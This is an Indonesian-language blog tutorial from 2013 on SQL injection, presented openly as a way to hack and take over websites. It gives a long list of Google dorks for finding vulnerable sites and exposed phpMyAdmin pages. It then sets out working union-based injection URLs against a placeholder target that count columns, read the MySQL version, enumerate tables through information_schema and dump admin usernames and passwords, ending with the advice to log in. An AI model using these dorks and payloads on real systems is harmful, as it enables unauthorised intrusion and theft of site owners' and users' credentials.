Home » » SQL Injection

SQL Injection

Written By Sumitro Aji Prabowo on Selasa, 14 Mei 2013 | 08.37



Hello sob, ketemu lagi, sekarang saya mau bahas teknik inject menginject bruakakakak
asal jangan inject hatiku ya :aw aw aw:




Yaudah langsung aja kita simak bareng-bareng, Saya ambil tutorial ini om M2 404 kenal kan ?

Apa itu SQLi ?
SQL Injection merupakan cara hack website yang paling banyak digunakan oleh para hacker. Kenapa? Karena dengan melakukan SQL injection, kita dapat langsung mengetahui username dan password dari website yang akan kita bajak.

Dibawah ini merupakan kumpulan dork yang dapat kita gunakan untuk mencari error dalam suatu website yang nantinya akan kita gunakan sebagai target SQLi.

Dork:
inurl:group_concat username 0x3a PASSWORD from robotinurl:group_concat username 0x3a PASSWORD from piratesinurl:group_concat username 0x3a PASSWORD from obamainurl:group_concat username 0x3a PASSWORD from shadowinurl:group_concat username 0x3a PASSWORD from khaninurl:group_concat username 0x3a PASSWORD from paulinurl:group_concat username 0x3a PASSWORD from pakistaninurl:group_concat username 0x3a PASSWORD from hackerinurl:group_concat username 0x3a PASSWORD from usersinurl:group_concat username 0x3a PASSWORD from adm
inurl:group_concat username 0x3a PASSWORD from admin

inurl:group_concat username 0x3a PASSWORD from user

inurl:concat username 0x3a password from sysibm.sysdummy1

inurl:concat username 0x3a password from israel

inurl:concat username 0x3a password from mr.bean

inurl:concat username 0x3a password from sysuser

inurl:concat username 0x3a password from sysadmin

inurl:/MyBB/Upload/inc/

inurl:db_mysql.php

inurl:sql.php?table=wp_users

inurl:sql.php?table=group

inurl:sql.php?table=phpMyAdmin

inurl:sql.php?table=users

inurl:sql.php?table=login

inurl:/phpMyAdmin/sql.php

inurl:sql.php?table=customer

inurl:sql.php?table=member

inurl:sql.php?table=account

inurl:sql.php?table=admin

inurl:sql.php?table=tblwhoislog

inurl:/usr/local/apache/htdocs

inurl:sql.php?table=jos_users

inurl:sql.php?table=mybb_users

inurl:sql.php?table=log

inurl:sql.php?table=pass

inurl:sql.php?table=informatio

n_schema

inurl:sql.php?table=proxies_priv

inurl:sql.php?table=mysql.user

inurl:sql.php?table=collection

inurl:sql.php?table=loginlog

inurl:sql.php?table=menu

inurl:sql.php?table=setting

inurl:sql.php?table=phpbb_user

s

inurl:/phpmyadmin/

sql.php?db=mysql&sql_query=

inurl:union+select+filetype:asp

inurl:union+select+filetype:php

inurl:union+select+filetype:cfm

inurl:union 4.1.22-standard-log

inurl:union 5.0.67-log

inurl:union» 4.1.22-log

inurl:union 5.0.32

inurl:union» 5.0.67

inurl:union» 5.0.51a-3ubuntu5

inurl:union» 5.1.63-cll

inurl:bootstrap.php

inurl:Host:+filetype:sql

inurl:phpMyAdmin running on localhost – phpMyAdmin 2.5.7-pl1

===========================================================================================================================

Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah : http://www.target.com/berita.php?id=100

2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.

Contoh :

http://www.target.com/berita.php?id=100'

atau

http://www.target.com/berita.php?id=-100

3. Maka akan muncul pesan error…
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.

4. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by

Contoh :

http://www.target.com/berita.php?id=100+order+by+1/*
 “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–”. 
Kalo “+” sebagai penghubung perintah…

5. Nah sampe sini langsung dah nyobain satu2…

http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)
Sampai muncul error…
Misalkan errornya disini…

http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang kita ambil adalah “9″
http://www.target.com/berita.php?id=100+order+by+9/*

6.Untuk mengetahui berapa angka yang show sekarang kita pake UNION

Contoh :

http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Trus perhatikan angka berapa yang keluar 

7.Misalnya angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”

http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau

http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*

8.Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…

Contoh :

http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL.
Misalnya yang lo liat adalah table “admin”

Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…

Contoh:

http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…

Contoh :

http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan

http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

Bisa diliat dah username ama passwordnya…Tinggal login

0 komentar:

Posting Komentar

Like us on Facebook
Follow us on Twitter
Recommend us on Google Plus